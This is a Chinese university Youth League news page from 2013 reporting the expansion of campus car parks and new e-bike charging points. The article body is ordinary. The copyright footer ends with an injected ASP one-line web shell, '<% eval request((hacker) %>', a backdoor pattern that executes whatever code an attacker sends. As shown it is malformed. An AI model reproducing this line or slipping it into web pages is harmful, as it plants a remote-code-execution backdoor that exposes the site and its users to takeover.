当前位置:共青团上海海洋大学委员会 >> 理论学习 >> 时政热点 >> 正文  
站内信息搜索:
“即知即改”系列报道之四:扩建机动车停车场,增设电动车充电装置
[2013年11月06日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

    针对老师们提出的我校机动车停车场太小、停车车位过少,电动车充电装置较少的问题,后勤管理处和紫泰物业对学校机动车停车场现状进行了全面调查,发现车位少导致停车难,停车占路造成通行困难的现象确实存在。经过认真研究和热烈讨论之后,学校决定扩建机动车停车场,以缓解与日俱增的停车难问题。目前,我校已经完成第三餐厅、行政楼停车场扩建工程。

    行政楼的电动车之前都是存放在车库,下雨天地下车库有积水,把电动车存放在地下车库存在安全隐患。于是学校决定在行政楼后面开辟存车空间,增设行政楼电动车的充电装置。同时,食品学院非机动车停车棚的建设也正在紧锣密鼓地进行中。完成扩建之后,后勤管理处将继续规范整顿停车秩序。一是设置相关标志,在停车场入口设置标志牌和温馨提示。二是强化日常监督,后勤管理处将派专人进行不定时的巡查,对违停车辆进行登记和处罚。

    学校立足实际,有计划的组织实施停车场的建设,想方设法增加车位,有效地缓解了停车难的问题。同时增设电动车充电装置,也给教职工和同学们带来了方便。

 

关闭窗口

上一篇:“来自基层的声音”之四:“有困难,找书记”

下一篇:我校召开本年度第20次党委常委会会议
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>